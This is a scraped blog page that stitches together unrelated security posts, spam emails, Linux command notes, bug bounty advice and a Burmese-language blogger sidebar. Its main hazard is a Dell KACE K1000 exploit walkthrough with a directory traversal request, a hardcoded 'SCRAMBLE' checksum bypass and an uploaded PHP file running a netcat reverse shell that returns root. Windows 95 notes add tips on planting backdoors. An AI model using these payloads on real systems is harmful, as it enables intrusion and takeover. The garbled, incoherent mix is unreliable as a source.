- Offensive Security Training: Developers of Kali Linux and Exploit DB, and the creators of the Metasploit Unleashed and Penetration Testing with Kali Linux course.
- Metasploit: Find security issues, verify vulnerability mitigations & manage security assessments with Metasploit. Get the worlds best penetration testing software now.
- Phrack Magazine: Digital hacking magazine.
- DEFCON: Information about the largest annual hacker convention in the US, including past speeches, video, archives, and updates on the next upcoming show as well as links and other details.
- SecTools.Org: List of 75 security tools based on a 2003 vote by hackers.
- NFOHump: Offers up-to-date .NFO files and reviews on the latest pirate software releases.
- The Hacker News: The Hacker News — most trusted and widely-acknowledged online cyber security news magazine with in-depth technical coverage for cybersecurity.
- Hackaday: A hardware hack every day.
- SecurityFocus: Provides security information to all members of the security community, from end users, security hobbyists and network administrators to security consultants, IT Managers, CIOs and CSOs.
- Black Hat: The Black Hat Briefings have become the biggest and the most important security conference series in the world by sticking to our core value: serving the information security community by delivering timely, actionable security information in a friendly, vendor-neutral environment.
- Packet Storm: Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers.
- Exploit DB: An archive of exploits and vulnerable software by Offensive Security. The site collects exploits from submissions and mailing lists and concentrates them in a single database.
- Hack Forums: Emphasis on white hat, with categories for hacking, coding and computer security.
- Makezine: Magazine that celebrates your right to tweak, hack, and bend any technology to your own will.
- Hacked Gadgets: A resource for DIY project documentation as well as general gadget and technology news.
- HackRead: HackRead is a News Platform that centers on InfoSec, Cyber Crime, Privacy, Surveillance, and Hacking News with full-scale reviews on Social Media Platforms.
- KitPloit: Leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security.
- Hakin9: E-magazine offering in-depth looks at both attack and defense techniques and concentrates on difficult technical issues.
hi
10822070765856542844noreply
here it is, social website traffic:
http://www.mgdots.co/detail.php?id=113
Full details attached
Regards
Linda Vanderzee
Unsubscribe option is available on the footer of our website
hi
Get your business to the next level with a solid Content Marketing strategy
http://www.str8-creative.io/product/content-marketing/
Regards
Allie Abelson
Unsubscribe option is available on the footer of our website
This morning I've found an scaring surprise on my Firefox Quantum. Casually it was connected to a proxy when an unexpected connection came up, the browser was connecting to an unknown remote site via HTTP and downloading a ZIP that contains an ELF shared library, without any type of signature on it.
This means two things
1) the owner of that site might spread malware infecting many many people.
2) the ISP also might do that.
Ubuntu Version:
Firefox Quantum version:
The URL: hxxp://ciscobinary.openh264.org/openh264-linux64-0410d336bb748149a4f560eb6108090f078254b1.zip
The zip contains these two files:
3f201a8984d6d765bc81966842294611 libgmpopenh264.so
44aef3cd6b755fa5f6968725b67fd3b8 gmpopenh264.info
The info file:
Name: gmpopenh264
Description: GMP Plugin for OpenH264.
Version: 1.6.0
APIs: encode-video[h264], decode-video[h264]
So there is a remote codec loading system that is unsigned and unencrypted, I think is good to be aware of it.
Related news
Y soluciona las siguientes problemáticas:
- Manejar una shell desde el pequeño teclado de un móvil es engorroso.
- Leer todos los resultados de un comando en la pantalla del móvil, nos dejamos la vista.
Esta app permite interactuar con servidores remotos simplemente haciendo pulsaciones en la pantalla, mediante un explorador de ficheros, de conexiones, etc..
Las funcionalidades nuevas de esta versión 1.0 son:
- Administración del Firewall Iptables.
- Opción de Custom Commands, tal como había prometido.
Las funcionalidades ya presentes en la v0.8 son:
- escalada a root mediante su y sudo
- gestor de procesos
- explorador de ficheros, editor de ficheros, editor de permisos.
- monitorización y baneo de conexiones
- Visualizadores de logs
- administrador de drivers
- estadisticas de disco
Para la versión 2.0 preveo:
- Escuchar música remota
- Descarga de ficheros (wget)
- Transferencia segura de ficheros entre servidores (scp)
- Gestures, para administrar los sitemas en plan minority report :)
App disponible en el market para 861 tipos de dispositivos y pronto disponible en tablets.
https://market.android.com/details?id=net.ssh.SSHControl
Cualquier sugerencia de mejora: sha0 [4t] badchecksum [d0t] net
More info
Another attack vector for static sites was trying to locate the IP of the customer instead of Akamai, if the customer doesn't use the Akamai Shadow service, it's possible to perform a HTTP Host header scan, and direct the attack to that host bypassing Akamai.
And what about Arbor protection? is good for reducing the flood but there are other kind of attacks, and this protection use to be disabled by default and in local holidays can be a mess.
More info
The first thing we can do when we have read access to the Windows directory through the share, is to locate all the *.pwl files on the c:\windows directory, copy them to your machine where Cain is installed, switch to Cracker tab, pwl files, load the pwl file, add username based on the filename, and try to crack it. If you can't crack it you might still try to add a .pwl file where you already know the password in the remote windows directory. Although this is a fun post-exploitation task, but still, no remote code execution. These passwords are useless without physical access.
- there is no "at" command (available since Windows 95 plus!)
- there is no admin share
- there is no RPC
- there is no named pipes
- there is no remote registry
- there is no remote service management
During my quest for a tool to hack Windows 95, I came across some pretty cool stuff:
But the best of the best is Fluxay, which has been written by chinese hackers. It is the metasploit from the year 2000. A screenshot is worth more than a 1000 words. 4 screenshot > 4 thousand words :)
But at the end, no remote code execution for me.
Don't try to download the Winsocks 2 patch from the official MS site, it is not there anymore, but you can download it from other sites.
After staring it for minutes, turned out it is constant, no new processes appeared.
Looking at the next screenshot, one can notice this OS was not running a lot of background processes ...
- You are lucky and not the plain Windows 95 is installed, but Windows 95 Plus! The main difference here is that Windows 95 Plus! has built-in scheduler, especially the "at" command. Just overwrite a file which is scheduled to execution, and wait. Mission accomplished!
- Ping of death - you can crash the machine (no BSOD, just crash) with long (over 65535 bytes) ICMP ping commands, and wait for someone to reboot it. Just don't forget to put your backdoor on the share and add it to autoexec.bat before crashing it.
- If your target is a plain Windows 95, I believe you are out of luck. No at command, no named pipes, no admin share, nothing. Meybe you can try to fuzz port 137 138 139, and write an exploit for those. Might be even Ping of Death is exploitable?
Now we can replace diskalm.exe with our backdoor executable, and wait maximum one hour to be scheduled.
Instead of a boring text based tutorial, I created a YouTube video for you. Based on the feedbacks on my previous tutorialz, it turned out I'm way too old, and can't do interesting tutorials. That's why I analyzed the cool skiddie videoz, and found that I have to do the followings so my vidz won't suck anymore:
- use cool black windows theme
- put meaningless performance monitor gadgets on the sidebar
- use a cool background, something related with hacking and skullz
- do as many opsec fails as possible
- instead of captions, use notepad with spelling errorz
- there is only one rule of metal: Play it fuckin' loud!!!!
Related word
Commands in Linux are just the keys to explore and close the Linux. As you can do things manually by simple clicking over the programs just like windows to open an applications. But if you don't have any idea about commands of Linux and definitely you also don't know about the Linux terminal. You cannot explore Linux deeply. Because terminal is the brain of the Linux and you can do everything by using Linux terminal in any Linux distribution. So, if you wanna work over the Linux distro then you should know about the commands as well. In this blog you will exactly get the content about Linux processes commands which are are given below.
ps
The "ps" command is used in Linux to display your currently active processes over the Linux based system. It will give you all the detail of the processes which are active on the system.ps aux|grep
The "ps aux|grep" command is used in Linux distributions to find all the process id of particular process like if you wanna know about all the process ids related to telnet process then you just have to type a simple command like "ps aux|grep 'telnet'". This command will give you the details about telnet processes.pmap
The "pmap" command in Linux operating system will display the map of processes running over the memory in Linux based system.top
The "top" command is used in Linux operating system to display all the running processes over the system's background. It will display all the processes with process id (pid) by which you can easily kill/end the process.Kill pid
Basically the kill command is used to kill or end the process or processes by simply giving the process id to the kill command and it will end the process or processes. Just type kill and gave the particular process id or different process ids by putting the space in between all of them. kill 456 567 5673 etc.killall proc
The "killall proc" is the command used in Linux operating system to kill all the processes named proc in the system. Killall command just require a parameter as name which is common in some of the processes in the system.bg
The "bg" is the command used in Linux distributions to resume suspended jobs without bringing them to foreground.fg
The "fg" command is used in Linux operating system to brings the most recent job to foreground. The fg command also requires parameters to do some actions like "fg n" n is as a parameter to fg command that brings job n to the foreground.More articlesA bug bounty program, also called a vulnerability rewards program (VRP), is a crowdsourcing initiative that rewards individuals for discovering and reporting software bugs. Bug bounty programs are often initiated to supplement internal code audits and penetration tests as part of an organization's vulnerability management strategy.
Many software vendors and websites run bug bounty programs, paying out cash rewards to software security researchers and white hat hackers who report software vulnerabilities that have the potential to be exploited. Bug reports must document enough information for for the organization offering the bounty to be able to reproduce the vulnerability. Typically, payment amounts are commensurate with the size of the organization, the difficulty in hacking the system and how much impact on users a bug might have.
Mozilla paid out a $3,000 flat rate bounty for bugs that fit its criteria, while Facebook has given out as much as $20,000 for a single bug report. Google paid Chrome operating system bug reporters a combined $700,000 in 2012 and Microsoft paid UK researcher James Forshaw $100,000 for an attack vulnerability in Windows 8.1. In 2016, Apple announced rewards that max out at $200,000 for a flaw in the iOS secure boot firmware components and up to $50,000 for execution of arbitrary code with kernel privileges or unauthorized iCloud access.
While the use of ethical hackers to find bugs can be very effective, such programs can also be controversial. To limit potential risk, some organizations are offering closed bug bounty programs that require an invitation. Apple, for example, has limited bug bounty participation to few dozen researchers.
Read more
Regarding to the TLSv1.2 RFC, this version of TLS provides a "signature_algorithms" extension for the client_hello.
Data Structures |
s->c->shared_sigalgs will be NULL, and the number of algorithms:
s->c->shared_sigalgslen will not be zeroed.
Which will be interpreted as one algorithm to process, but the pointer points to 0x00 address.
StackTrace |
The following code, points sigptr to null and try to read sigptr->rsign, which is assembled as movzbl eax, byte ptr [0x0+R12] note in register window that R12 is 0x00
Debugger in the crash point. |
radare2 static decompiled |
Get David A. Ramos' proof of concept exploit here
More information
These are some simple steps that every bug bounty hunter can use to get started and improve their skills:
Learn to make it; then break it!
A major chunk of the hacker's mindset consists of wanting to learn more. In order to really exploit issues and discover further potential vulnerabilities, hackers are encouraged to learn to build what they are targeting. By doing this, there is a greater likelihood that hacker will understand the component being targeted and where most issues appear. For example, when people ask me how to take over a sub-domain, I make sure they understand the Domain Name System (DNS) first and let them set up their own website to play around attempting to "claim" that domain.
Read books. Lots of books.
One way to get better is by reading fellow hunters' and hackers' write-ups. Follow /r/netsec and Twitter for fantastic write-ups ranging from a variety of security-related topics that will not only motivate you but help you improve. For a list of good books to read, please refer to "What books should I read?".
Join discussions and ask questions.
As you may be aware, the information security community is full of interesting discussions ranging from breaches to surveillance, and further. The bug bounty community consists of hunters, security analysts, and platform staff helping one and another get better at what they do. There are two very popular bug bounty forums: Bug Bounty Forum and Bug Bounty World.
Participate in open source projects; learn to code.
Go to https://github.com/explore or https://gitlab.com/explore/projects and pick a project to contribute to. By doing so you will improve your general coding and communication skills. On top of that, read https://learnpythonthehardway.org/ and https://linuxjourney.com/.
Help others. If you can teach it, you have mastered it.
Once you discover something new and believe others would benefit from learning about your discovery, publish a write-up about it. Not only will you help others, you will learn to really master the topic because you can actually explain it properly.
Smile when you get feedback and use it to your advantage.
The bug bounty community is full of people wanting to help others so do not be surprised if someone gives you some constructive feedback about your work. Learn from your mistakes and in doing so use it to your advantage. I have a little physical notebook where I keep track of the little things that I learnt during the day and the feedback that people gave me.
Learn to approach a target.
The first step when approaching a target is always going to be reconnaissance — preliminary gathering of information about the target. If the target is a web application, start by browsing around like a normal user and get to know the website's purpose. Then you can start enumerating endpoints such as sub-domains, ports and web paths.
A woodsman was once asked, "What would you do if you had just five minutes to chop down a tree?" He answered, "I would spend the first two and a half minutes sharpening my axe."
As you progress, you will start to notice patterns and find yourself refining your hunting methodology. You will probably also start automating a lot of the repetitive tasks.
POST /userui/downloadpxy.php HTTP/1.1That bug is neat, but its post-auth and can't be used for RCE because it returns the file as an attachment :(
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: kboxid=xxxxxxxxxxxxxxxxxxxxxxxx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
DOWNLOAD_SOFTWARE_ID=1227&DOWNLOAD_FILE=../../../../../../../../../../usr/local/etc/php.ini&ID=7&Download=Download
HTTP/1.1 200 OK
Date: Tue, 04 Feb 2014 21:38:39 GMT
Server: Apache
Expires: 0
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: public
Content-Length: 47071
Content-Disposition: attachment; filename*=UTF-8''..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Flocal%2Fetc%2Fphp.ini
X-DellKACE-Appliance: k1000
X-DellKACE-Version: 5.5.90545
X-KBOX-Version: 5.5.90545
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/ini
[PHP]
;;;;;;;;;;;;;;;;;;;
; About php.ini ;
;;;;;;;;;;;;;;;;;;;
http://targethost/service/kbot_upload.php
$checksumFn = $_GET['filename'];
$fn = rawurldecode($_GET['filename']);
$machineId = $_GET['machineId'];
$checksum = $_GET['checksum'];
$mac = $_GET['mac'];
$kbotId = $_GET['kbotId'];
$version = $_GET['version'];
$patchScheduleId = $_GET['patchscheduleid'];
if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != "SCRAMBLE") {
KBLog($_SERVER["REMOTE_ADDR"] . " token checksum did not match, "
."($machineId, $checksumFn, $mac)");
KBLog($_SERVER['REMOTE_ADDR'] . " returning 500 "
."from HandlePUT(".construct_url($_GET).")");
header("Status: 500", true, 500);
return;
}
md5("$filename $machineId $mac" . 'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');
private static function calcTokenChecksum($filename, $machineId, $mac)
{
//return md5("$filename $machineId $mac" . $ip .
// 'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');
// our tracking of ips really sucks and when I'm vpn'ed from
// home I couldn't get patching to work, cause the ip that
// was on the machine record was different from the
// remote server ip.
return md5("$filename $machineId $mac" .
'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');
}
if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != "SCRAMBLE") {
POST /service/kbot_upload.php?filename=db.php&machineId=../../../kboxwww/tmp/&checksum=SCRAMBLE&mac=xxx&kbotId=blah&version=blah&patchsecheduleid=blah HTTP/1.1Once this was sent, we can setup our listener on our server and call the file we uploaded and receive our root shell:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 190
<?php
require_once 'KSudoClient.class.php';
KSudoClient::RunCommandWait("rm /kbox/kboxwww/tmp/db.php;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc REMOTEHOST 4444 >/tmp/f");?>
http://targethost/service/tmp/db.php
~$ ncat -lkvp 4444
Ncat: Version 5.21 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from XX.XX.XX.XX
sh: can't access tty; job control turned off
# id
uid=0(root) gid=0(wheel) groups=0(wheel)
So at the end of the the day the count looks like this:
Directory Traversals: 2That all adds up to owned last time I checked.
Backdoors: 2
Privilege Escalation: 1
Example PoC can be found at the following location:
https://github.com/steponequit/kaced/blob/master/kaced.py
Example usage can be seen below:
Related posts
These are some simple steps that every bug bounty hunter can use to get started and improve their skills:
Learn to make it; then break it!
A major chunk of the hacker's mindset consists of wanting to learn more. In order to really exploit issues and discover further potential vulnerabilities, hackers are encouraged to learn to build what they are targeting. By doing this, there is a greater likelihood that hacker will understand the component being targeted and where most issues appear. For example, when people ask me how to take over a sub-domain, I make sure they understand the Domain Name System (DNS) first and let them set up their own website to play around attempting to "claim" that domain.
Read books. Lots of books.
One way to get better is by reading fellow hunters' and hackers' write-ups. Follow /r/netsec and Twitter for fantastic write-ups ranging from a variety of security-related topics that will not only motivate you but help you improve. For a list of good books to read, please refer to "What books should I read?".
Join discussions and ask questions.
As you may be aware, the information security community is full of interesting discussions ranging from breaches to surveillance, and further. The bug bounty community consists of hunters, security analysts, and platform staff helping one and another get better at what they do. There are two very popular bug bounty forums: Bug Bounty Forum and Bug Bounty World.
Participate in open source projects; learn to code.
Go to https://github.com/explore or https://gitlab.com/explore/projects and pick a project to contribute to. By doing so you will improve your general coding and communication skills. On top of that, read https://learnpythonthehardway.org/ and https://linuxjourney.com/.
Help others. If you can teach it, you have mastered it.
Once you discover something new and believe others would benefit from learning about your discovery, publish a write-up about it. Not only will you help others, you will learn to really master the topic because you can actually explain it properly.
Smile when you get feedback and use it to your advantage.
The bug bounty community is full of people wanting to help others so do not be surprised if someone gives you some constructive feedback about your work. Learn from your mistakes and in doing so use it to your advantage. I have a little physical notebook where I keep track of the little things that I learnt during the day and the feedback that people gave me.
Learn to approach a target.
The first step when approaching a target is always going to be reconnaissance — preliminary gathering of information about the target. If the target is a web application, start by browsing around like a normal user and get to know the website's purpose. Then you can start enumerating endpoints such as sub-domains, ports and web paths.
A woodsman was once asked, "What would you do if you had just five minutes to chop down a tree?" He answered, "I would spend the first two and a half minutes sharpening my axe."
As you progress, you will start to notice patterns and find yourself refining your hunting methodology. You will probably also start automating a lot of the repetitive tasks.
PDF is safe to open
Image stolen from Kaspersky |
Java is secure
Stay away from rogue websites and you will be safe
Don't use open WiFi
The password policy nightmare
Sites with a padlock are safe
Use Linux, it is free from malware
OSX is free from malware
Updated AV + firewall makes me 100% safe
How to backup data
Disconnect your computer from the Internet when not used
Use (free) VPN to protect your anonimity
The corporate "security tips" myth
Use robots.txt to hide secret information on public websites
My password policy is safer than ever
Use WAF, IDS, IPS, Nextgen APT detection hibber-gibber and you will be safe
Conclusion
Related word
ျပည္တြင္းျပည္ပသတင္း
သတင္းဂ်ာနယ္
ဗြီဒီယိုႏွင့္သီခ်င္းမ်ား
အစိမ္းေရာင္ျပေနရင္ ေျပာခ်င္တာေျပာပါ
၂၆၊၈၊၂ဝဝ၉တြင္စတင္သည္
menu
- Home
- How to Create Vertical Menu
- Navigation page for blogger
- Statistice widget for blogger
- HTMLcode appears posting(auto highlight)
- Blog comment sent to@mail
- Disable right click
- How to make a dropdown menu
- Make a marquee effect(1)
- Tagcloud-Generator
- Make a marquee effect
- HTMLcode appears posting
- Floating "Top of Page" Icon Widget
- Change The Address bar Icon (Favicon)
- How to add news to your blog
- Scroll Bar Widget For Blogger
- Add Digg Button To Post Page
- How to make element below of the header
- Split header column became two column
- Install More-Smilies Emoticons To Post Editor
- Embedded Comment Form Under Post
- Free Tool – CSS Menu Generator
- Free Unlimitted File Hosting
- Free Icons For Website and Weblog
- How Show Older Posts-Newer Posts Links At Top Of Posts
- Change Older Post And Newer Post Link With Images Blogger
- Crear Round Image Corners Generator&Reflectionmaker
- Multi Web Search Engines Widget
- Free Tool – CSS Tab Designer
- Add Alert Script in Blog
- How to Remove the Number of Label
- How to Print your Blogger Posts
- How to display codes and scripts in your blogger posts
- Hide Navbar From Blogger Layout
- Free Image Hosting With Unlimited Bandwidth
- How to Remove the Number of archive
- Automatic Thumbnail and Read More Function for Blogger
- How to Change Blogger Template Without Deleting Widget
- How Make Page Peel Effect Add For Blogger
- How Add Signature Below Each Post In Blogger
- How to show different background image for separate posts or paragraphs
- Add Labels Rss Feed Link Button To All Your Blogger Categories
- Create Three Column in Blogger Footer
- Add a Tweet It or Retweet Button to Your Blog
- Create An HTML Rollover Button For Your Blogger
- Popular Posts Widget For Blogger - New and Working
- Add Sexy Bookmarks to Blogger
- Create a Customized Side Menu In Your Blogger / BlogSpot Blog
- Comment numbering in Blogger
- Free Dropdown Menu Creator
- Add Button 'Save Blogger Post As Pdf' Blogger
- Check How Fast Your Blog / Web Site Loads - Speed Up Your Blog
- Animated (On Hover) Fixed-Floating Twitter-Follow Me Badge
- Highlight Text In Posts Through Colored HTML Text Boxes
- How To Move Your Post From One Blog To Another
- Add yahoo online logo for blogger
- Adding Google talk for blogger
- Related Posts with Thumbnails for Blogger
- Highlight Author Comment in Blogspot
- How Increase/Strong Your Wi-Fi Signals Strength
- Auto Scrolling - Recent Posts Widget For Blogger/Blogspot Blogs
- How Install Wibiya Toolbar Multi Function Widget
- 31+ Free online Image and Photo Editing Tools
- Remove Subscribe To Post Atoms
- Show Comment Bubble At Top Of Each Blogger Posts
- How To Show Your Name in Windows Taskbar
- Open Links In New Window For Your Blog
- Add a Page Element Blogger Header And Blog Posts
- Free Blogger Template Generators!
- Useful Keyboard Shortcut For Ubuntu
- Chatting devices for Blogger usage
- Free File Hosting Site
- Free Image Hosting Site
- How to clear your computer's memory
- Automatically Get Alerts For Gmail
- Add "Back To Top" And "Go Down" Links To Blogger Blog
- Just Click than Open All Post Together
- Blogger Basics: How to Keep a Post Always at Top
- How to Add Image as Sidebar Background
- Show Recent Comments with Summaries
- Get rating & recommendations widget for Blogger
- Replace Date with a cool new calendar type layout in blogger
- Add a Post Divider (Separator) Between Blogger (Blogspot) Posts
- Download Greasemonkey
- Floating Vertical Navigation Menu
- How to show colored Background for HTML and JAVA Scripts in Post of Blogger blogs
- "Follow Me On Twitter" Widget For Blogger Blog
- Free YouTube to MP3 Converter
- Pop Up Navigation Menu From Bucket Using jQuery In Blogger
- A simple blog search engine
- Add Images or Icons to Sidebar links
- Add a 3d wobbling tag cloud to blogger
- Facebook Share Button For Blogger
- Add A Facebook Badge To Your Blogger Blog
- How to change default cursor in blogger
- How to change email address for Blogger login
- Increase Your Text Size with single click [Widget for blogger]
- Gmail – Import Your Yahoo Mail, Hotmail, AOL Email And Contacts To Gmail
- Multi Tab Widget For Blogger/Blogspot Blogs(easiest way)
- Check The Loading Time Of Your Website/Blog
- Use Marque To create a cool Sliding Effect
- How to put an Embedded Comment Form
- Change Size of Blogger Comment form
- Blogger Post Image Borders Change or Remove
- Get the Blogger And Wordpress, Typepad Snapshots
- How align Blogger widget To Centre Left or Right Of Page
- How To Make Your Blog Name Scrolling
- How To Add Change Font Size/Colour Widget to blogger
- Customizing your header: add an image Add Printer Button or Link to Blogger Blogspot
- Submit your blog URL to 100+ search engines
- Add Top Comments automatically to Blogger
- Add your blog to Google Blog Search
- How To Show/Hide Text Using JavaScript Toggle Method
- How To Add Heart Social Bookmark Icons to Blogger Post
- Leaves Fall Social Bookmark Button For Blogger Post
- How To Add 4 Columns to your Footer Section
- Easiest Way To Add Fixed Background Image On Blogger
- Add icon or picture in Blogger Post Title
- Change the Post Title Font Easily
- Create Amazing Header images for blogs/websitesXHeader
- Add Multi-Color Effect For Your Links On Hover For Blogger Blogs
- Add Scrollbars to Blog Posts
- How To Add jQuery Popup Boxes To Blogger
- Easy way To Recent comment Widget
- How To Add jQuery Popup Boxes To Blogger
- How to Customize Titles in Sidebar of Blogger
- Visitors Change The Text Size And Font Of Your Blog Posts
- Post on Blogger from Mobile phone and Email
- How to add "Email Subscription Form" to your blog(blogger,blogspot)
- Replace 'Post A Comment' With An Image And Text In Your Blogger Comment Section
- Make first letter of your post large and attractive
- Vertical menubar for Blogspot
- How To Add Show/Hide NavBar Link to Blogger
- How To Replace Read More Text With Image
- Numbered Page Navigation Hack For Bloggers
- Show Only Post Title In Blogger Label-Archive-Home Pages
- JQuery MouseOver Social Bookmark Icons For Bloggers
- Charm CSS Horizontal Menu For Blogger/Websites
- Most Useful Mozilla Firefox Keyboard Shortcuts
- Add more Recent Comment for Blog
- How To Add Auto 'Read More' Feature with Thumbnails
- Expandable Post Summary for the New Blogger
- Add Automatic Read More Function To Blogger
- How To Show Post Title Only on HomePage in Blogger
- Replace "Subscribe to: Posts (Atom)" With "Subscribe to: Posts (RSS)"
- How To Give New look to Your Links
Twitter Updates
Your Name
- Digg/username
- Flickr/username
- Myspace/username
- Facebook/Your Name
- Friendster/Your Name
- Virb/username
- Linkedin/Public Profile Name
- Twitter/username
- YouTube/username
- Last.fm/username
- Del.icio.us/username
- Wikipedia/username
- Wishlist/Your Name
- Skype/username
- AIM/screen name
- GMail/Your Name
- coComment/username
- iJigg/username
- PureVolume/username
- Upcoming/Your Name
- Kongregate/username
- Zaadz/username
- Technorati/username
- MyBlogLog/username
- Blog/Your Name
- Get your own Widget
Blog Archive
- ▼ 2020 (453)
စုစုေပါင္း
ဘယ္ကလာသလဲ
ျပည္တြင္းျပည္ပသတင္း
သတင္းဂ်ာနယ္
ဗြီဒီယိုႏွင့္သီခ်င္းမ်ား
PostRank
Basshunter - All I Ever Wanted
စလံုးေတြေသးေနရင္ဒီမွာေျပာင္းပါ
ေခါင္းစဥ္မ်ား
- ၁။ဘေလာ့ Comments ေတြကိုမိမိရဲ့အီးေမးလ္ထဲမွာေရာက္ေစျခင္ရင္
- ၂။ မိမိရဲ့ဘေလာ့မွာ Vertical Menu တည္ေဆာက္ျခင္ရင္
- ၃။မိမိရဲ့ဘေလာ့စာမ်က္ႏွာေတြကိုခြေက်ာ္ျခင္ရင္
- ၄။မိမိရဲ့ဘေလာ့မွာေရးခဲ့သမၽွ Post အေရအတြက္ႏွင့္ Comment အေရအတြက္သိျခင္ရင္
- ၅။မိမိရဲ့ဘေလာ့ Post ေပၚမွာ HTML code ကို Auto Highlight ျဖင့္တင္ျခင္ရင္
- ၆။မိမိရဲ့ဘေလာ့ Post မွာတင္ထားေသာ ဓါတ္ပံုမ်ားကိုအသိေပးၿပီးမွေတာင္းေစျခင္ရင္
- ၇။မိမိရဲ့ဘေလာ့မွာ Dropdown menu ေလးတည္ေဆာက္ျခင္ရင္
- မိမိရဲ့ဘေလာ့ေပၚမွာ စာေၾကာင္းေလးအသြားနဲ႔ထားျခင္ရင္
- ၈။မိမိဘေလာ့မွာ စိတ္တိုင္းၾက Tag-cloud Menu ေလးတည္ေဆာက္ျခင္ရင္
- ၉။မိမိရဲ့ဘေလာ့မွာ စာေၾကာင္းေလးေတြကို ေအာက္မွအေပၚသို႔တက္ေအာင္လုပ္ျခင္ရင္
- ၁ဝ။Greasemonkey ကို Download ယူျခင္ရင္
- ၁၁။HTMLcode colour software ကိုအခမဲ့ Download ယူျခင္ရင္
- ၁၂။မိမိရဲ့ဘေလာ့ Post ေပၚမွာ HTML code ကိုေပၚေအာင္လုပ္ျခင္ရင္
- ၁၃။မိမိရဲ့ဘေလာ့ မ်က္ႏွာကို ေအာက္မွအေပၚသို႔လၽွင္ျမန္စြာပို႔ျခင္ရင္
- ၁၄။မိမိရဲ့ဘေလာ့ Icon ေနရာမွာ မိမိႏွစ္သည့္ Icon ေလးထည့္ျခင္ရင္(favicon)
- ၁၅။မိမိဘေလာ့ေပၚမွာ ေန႔စဥ္ကမ႓ာသတင္း၊အစရိွသည့္မိမိႏွစ္သက္သည့္သတင္းမ်ားထားျခင္ရင္
- ၁၆။မိမိရဲ့ဘေလာ့ Menu ေတြကို Scroll Bar Widget ျဖင့္တည္ေဆာက္ျခင္ရင္
- ၁၇။မိမိရဲ့ဘေလာ့ Post ေပၚမွာ Diggေန႔စြဲေလးထားျခင္ရင္
- ၁၈။မိမိရဲ့ဘေလာ Header ေပၚမွာ Add a Gadget ထားျခင္ရင္
- ၁၉။မိမိရဲ့ဘေလာ့ Header ေဘးမွာ Add a Gadget ထားျခင္ရင္
- ၂ဝ။မိမိရဲ့ဘေလာ့ Post ေပၚမွာSmilies Emoticons ထည့္ျခင္ရင္
- ၂၁။မိမိရဲ့ဘေလာ့ Post ေအာက္မွာ Embedded Comment Box ထားျခင္ရင္
- ၂၂။CSS Menu Generator ကိုအခမဲ့ Download ယူျခင္ရင္
- ၂၃။အခမဲ့ File Hosting လုပ္ျခင္ရင္
- ၂၄။ဘေလာ့ဂါႏွင့္ Website အတြက္ အခမဲ့ Icon ဝက္ဆိုက္မ်ား
- ၂၅။မိမိရဲ့ဘေလာ့ Post အေပၚမွာ Older posts link ႏွင့္ Newer posts link ထားျခင္ရင္
- ၂၆။မိမိရဲ့ဘေလာ့ Post ေအာက္မွာ Older posts link ႏွင့္ Newer posts link ထားျခင္ရင္
- ၂၇။မိမိရဲ့ဓါတ္ပံုေတြကို အရိပ္ေပၚေအာင္လုပ္ျခင္ရင္ အခမဲ့ Site ေလး
- ၂၈။မိမိဘေလာ့ေပၚမွာ Google Web Search Box ေလးထားျခင္ရင္
- ၂၉။CSS Tab Designer software အခမ့ download ယူျခင္ရင္
- ၃၀။မိမိဘေလာ့ဖြင္႔တိုင္မွာေပၚလာမည့္ အဖြင့္စာေၾကာင္းေလးထည့္ျခင္ရင္(Alert Script)
- ၃၁။မိမိဘေလာ့က Labelနံပါတ္ေတြကိုျဖဳတ္ျခင္ရင္
- ၃၂။မိမိရဲ့ဘေလာ့ Post ေတြကို Print ထုပ္လြယ္ကူေအာင္လုပ္ျခင္ရင္
- ၃၃။မိမိဘေလာ့ Post မွာ HTML code ကိုအလြယ္တကူေပၚေအာင္လုပ္ျခင္ရင္
- ၃၄။မိမိရဲ့ဘေလာ့ Navbar ကိုျဖဳတ္ျခင္ရင္
- ၃၅။ဘေလာ့ဂါအတြက္အေကာင္းဆံုး Image Hosting လုပ္ျခင္ရင္
- ၃၆။မိမိဘေလာ့က archive နံပါတ္ေတြကိုျဖဳတ္ျခင္ရင္
- ၃၇။မိမိဘေလာ့ post ေအာက္မွာRead More Functionထည့္ျခင္ရင္
- ၃၈။တစ္ခ်က္ကေလးႏိုပ္လိုက္တာနဲ႔မိမိရဲ့ဘေလာ့ Post အသစ္ႏွင့္အေဟာင္းအားလံုးတၿပိဳင္ထဲေပၚေစျခင္ရင္
- ၃၉။က်ေနာ္တို႔Blogger Templateေျပာင္းသည့္အခါWidget ေတြေပ်ာက္မသြားေအာင္လုပ္ျခင္ရင္
- ၄ဝ။RSS IconကိုMouseနဲ႔ေထာက္လိုက္ရင္ စာမ်က္ႏွာကAutoလွန္ေအာင္လုပ္ျခင္ရင္
- ၄၁။မိမိရဲ့ Post ေအာက္မွာထိုးျမဲလက္မွတ္ေလးထည့္ထားျခင္ရင္
- ၄၂။မိမိရဲ့ဘေလာ့Templates ေအာက္မွာ Three Column Footer ထည့္ျခင္ရင္
- ၄၃။မိမိဘေလာ ့Post ေနာက္ခံပံုကို တစ္ခုနဲ႔တစ္ခုမတုူေအာင္လုပ္ျခင္ရင္
- ၄၄။မိမိရဲ့ဘေလာ့Categoriesေခါင္းစဥ္ေတြအားလုံးေရွ႕မွာ Rss Feed Link Button ေလးထားျခင္ရင္
- ၄၅။မိမိရဲ့ဘေလာ့မွာ Tweet နဲ့ Retweet Button ေလးထည့္ျခင္၇င္
